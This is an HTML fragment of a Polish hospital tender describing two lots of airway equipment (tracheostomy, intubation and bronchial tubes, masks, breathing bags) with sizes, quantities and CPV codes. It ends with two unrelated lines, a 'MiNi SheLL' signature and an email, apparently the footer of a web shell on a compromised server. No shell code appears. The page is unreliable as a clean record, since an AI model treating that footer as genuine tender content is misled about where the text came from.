<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Rurka tracheostomijna z mankietem typu Hi-Lo z linią RTG ze stałym transparentnym szyldem z oznaczeniem średnicy zewnętrznej i wewnętrznej rurki, transparentny balonik kontrolny oraz dren łączący z rurką, transparentny łącznik 15 mm ,  w komplecie tasiemka oraz prowadnica, sterylna, od 5 do 10	 - 50 szt.	<br>
2. Rurka tracheostomijna z otworami fenestracyjnymi (4 otwory) i bez otworów, miękkim, obrotowym (w płaszczyźnie góra-dół) szyldem, z mankietem wysokoobjętościowym niskociśnieniowym i bez oraz jednorazową kaniulą wewnętrzną mocowaną na rurce za pomocą specjalnego zatrzasku. W komplecie obturator, zatyczka dekaniulacyjna oraz taśma do mocowania, sterylna, od 4 do 10	 - 50 szt.	<br>
3. Kaniule wewnętrzne jednorazowego użytku ze zintegrowanym złączem zatrzaskowym 15 mm, do szybkiej i bezpiecznej wymiany, od 4 do 10	- 50 szt.	<br>
4. Rurki tracheostomijne do długoterminowego użytkowania z kaniulą wewnętrzną wielorazowego użytku, wykonane z wysokiej jakości medycznego PCW, z mankietem wysokoobjętościowym niskociśnieniowym i bez, z pojedynczym otworem fenestracyjnym i bez otworu, z obrotowym (w płaszczyźnie góra-dół) szyldem (obrót szyldu umożliwiający dopasowanie do warunków anatomicznych pacjenta), W komplecie obturator, zatyczka dekaniulacyjna oraz taśma do mocowania, sterylna, od 4 do 10 - 50 szt.	<br>
5. Rurka laryngektomijna, wykonana z wysokiej jakości materiału o dużej podatności (alternatywa do rurek metalowych), jednorazowa, sterylna, od 6 do 10 - 100 szt.	<br>
6. Zawór foniatryczny do rurek tracheostomijnych z membraną silikonową z integralnym złączem do podawania tlenu i bez membrany - 10 szt.<br>
7. Standardowa rurka tracheostomijna z regulowanym kołnierzem i mankietem typu HI-LO z linią RTG w komplecie tasiemka oraz prowadnica, sterylna, od 5 do 10	 - 100 szt.	<br>
8. Zbrojona rurka tracheostomijna z regulowanym kołnierzem, mankietem typu HI-LO oraz systemem do automatycznego dostosowania ciśnienia w mankiecie, sterylna, od 6 do 11 - 100 szt.	<br>
9. Rurka tracheostomijna z mankietem niskociśnieniowym  z systemem umożliwiającym  ciągłą kontrolę ciśnienia w mankiecie  oraz możliwością odsysania wydzieliny znad mankietu ze stałym transparentnym szyldem z zaznaczonym rozmiarem rurki, dren do odsysania o grubości min 4 mm połączony z szyldem rurki, sterylna, od 6 do 10 - 50 szt.<br>	
10. Rurka tracheostomijna z mankietem z czystego silikonu, sterylna, od 5 do 9,5 - 50 szt.	<br>
11. Rurka tracheostomijna z mankietem wysokoobjetościowym niskociśnieniowym i bez mankietu, z przedłużoną częścią proksymalną, obrotowym szyldem oraz z wewnętrzną kaniulą, sterylna, od 5 do 8 - 20 szt.	<br>
12. Rurka tracheostomijna z mankietem wysokoobjetościowym niskociśnieniowym i bez mankietu, z przedłużoną częścią dystalną, obrotowym  szyldem oraz wewnętrzną kaniulą, sterylna, od 5 do 8 - 20 szt.	<br>
13. Wymienne kaniule do rurek tracheostomijnych z przedłużoną częścią dystalną bądź proksymalną, sterylna, od 5 do 8 - 40 szt.	<br>
14. Pasek mocujący do rurek tracheostomijnych z wygodnym systemem zapinania i podwójną regulacją długości (na rzep)	- 10000 szt.	<br>
15. Rurka intubacyjna z mankietem w kształcie stożka do przedłużonej intubacji wyposażona w system drenażu przestrzeni podgłośniowej. min.dwa oznaczenia rozmiaru na korpusie rurki, półtransparentny łącznik 15mm, mankiet niskociśnieniowy, w górnej części o średnicy większej niż średnica tchawicy, zwężający się stopniowo ku dołowi (stożek), posiadający dzięki swej konstrukcji strefę całkowitego uszczelnienia tchawicy. grubość mankietu ok.50 mikronów, dren do odsysania min. 4 mm średnicy, sterylna, od 3,0  do 10,0 co 0,5 cm	 - 300 szt.	<br>
16. Rurka intubacyjna z mankietem w kształcie stożka do przedłużonej intubacji , min. dwa oznaczenia rozmiaru na korpusie rurki,półtransparentny łącznik 15mm, mankiet niskociśnieniowy, w górnej części o średnicy większej niż średnica tchawicy, zwężający się stopniowo ku dołowi (stożek), posiadający dzięki swej konstrukcji strefę całkowitego uszczelnienia tchawicy, grubość mankietu ok.50 mikronów, sterylna, od 5 do 10 - 500	szt.	<br>
17. Rurki tracheostomijne z uszczelnieniem dla dzieci, niskociśnieniowy, cienkościenny mankiet, jałowe, pakowane pojedynczo, tasiemka mocująca, od 4,0 do 9,0 co 0,5 cm	- 500 szt.	<br>
18. Rurki tracheostomijne bez uszczelnienia dla dzieci, jałowe, pakowane pojedynczo, tasiemka mocująca, od 3,0 do 8,0 co 0,5 cm - 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa rurek dotchawiczych, rurek inkubacyjnych, rurek odoskrzelowych, prowadnic, rurek nosowo- gardłowych i ustno- gardłowych, masek twarzowych, worków oddechowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Rurka dotchawicza bez mankietu uszczelniającego (do intubacji przez usta i nos), opakowanie odpowiadające kształtem krzywiźnie rurki, sterylna	, od 2 do 7 co 0,5cm	- 1000 szt.	<br>
2. Rurka intubacyjna do intubacji przez nos lub usta z mankietem niskociśnieniowym wysokoobjętościowym, sterylna, od 3 do 10 co 0,5cm - 6000 szt.	<br>
3. Rurka dotchawicza zbrojona z mankietem niskociśnieniowym (dwa oznaczenia głębokości nad mankietem w postaci ringów dookoła obwodu rurki), wyposażona w metalową spiralę wzmacniającą, sterylna, od 3 do 9,5 co 0,5cm	- 1500 szt.	<br>
4. Rurka dotchawicza do mikrochirurgii krtani (do intubacji przez usta jak i przez nos), sterylna	, od 4 do 6 - 50 szt.<br>	
5. Rurka uformowana do laryngektomii, stosowana podczas operacji krtani lub tchawicy, sterylna, od 7 do 8 - 50 szt.<br>	
6. Kształtowana rurka intubacyjna do zastosowania podczas zabiegów w obrębie głowy i szyi doustna z mankietem, sterylna, od 4 do 9 - 500 szt.<br>	
7. Kształtowana rurka intubacyjna do zastosowania podczas zabiegów w obrębie głowy i szyi donosowa z mankietem, sterylna, od 6 do 8 - 500 szt.	<br>
8. Rurka intubacyjna wyłącznie donosowa, (północna ) z mankietem Hi-Lo z dwoma ringami nad mankietem na całym obwodzie rurki, z linią RTG, specjalne bardzo delikatne i miękkie tworzywo, sterylna, od 6 do 8 - 200 szt.	<br>
9. Rurka dooskrzelowa lewa z mankietem tchawiczym z poliuretanu, znaczniki  RTG na zakończeniu dystalnym  rurki, ponad mankietem dooskrzelowym z PCV  a także przy wejściu do tchawicy ułatwiające i weryfikujące położenie rurki. W zestawie dwa cewniki do odsysania oraz złączka Y wraz z zestawem złączy, sterylna, od 28 do 41 CH	- 10 szt.	<br>
10. Rurka dooskrzelowa prawa z mankietem tchawiczym z poliuretanu, znaczniki  RTG na zakończeniu dystalnym  rurki, ponad mankietem dooskrzelowym z PCV  w kształcie litery S  a także przy wejściu do tchawicy ułatwiające i weryfikujące położenie rurki. W zestawie dwa cewniki do odsysania oraz złączka Y wraz z zestawem złączy, sterylna, od 35 do 41 CH	- 10 szt.	<br>
11. Zestaw do CEPAPu jednorazowego użytku, sterylny, do rurek dooskrzelowych - do zapobiegania lub leczenia niedotlenienia podczas znieczulenia z wentylacją jednego płuca	- 20 szt.	<br>
12. Prowadnica do rurek intubacyjnych,sterylna, jednorazowa, pakowana pojedynczo, do rurek od 2,5 do 10	- 100 szt.	<br>
13. Rurka nosowo - gardłowa, sterylna, od 6,5 do 8,5 - 10 szt.	<br>
14. Rurki ustno gardłowe sterylne jednorazowe, od 0 do 6	- 10000 szt.<br>	
15. Rurki intubacyjne bez uszczelnienia, zbrojone do stosowania w anestezjologii, zbrojenie rurki  metalową spiralą, jednolicie zatopioną w jej ścianie, znacznik rtg na całej długości rurki, wbudowane okienko Murphyego, do intubacji przez nos i przez usta, sterylne, jednorazowego użytku, pakowane pojedynczo, od 4,0 do 7,0 co 0,5 cm - 300 szt.	<br>
16. Maski twarzowe anestezjologiczne, jednorazowe, sterylne lub czyste, kodowane kolorami, w wersji standardowej i nadmuchiwane, od 1,0 do 5,0 - 4000 szt.	<br>
17. Worki oddechowe bezlateksowe, sterylne, pakowane pojedynczo, od 0,5 l do 3,0 l	- 4000 szt.	<br>
18. Rurki intubacyjne polarne, do intubacji przez usta jednorazowe, sterylne bez lateksu z jednym otworem z balonem uszczelniającym, od 6,0 do 9,0 co 0,5 cm - 300 szt.	<br>
19. Rurki intubacyjne polarne, do intubacji przez nos jednorazowe, sterylne bez lateksu z jednym otworem z balonem uszczelniającym, od 6,0 do 8,0 co 0,5 cm - 300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.20-8, 33.17.11.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com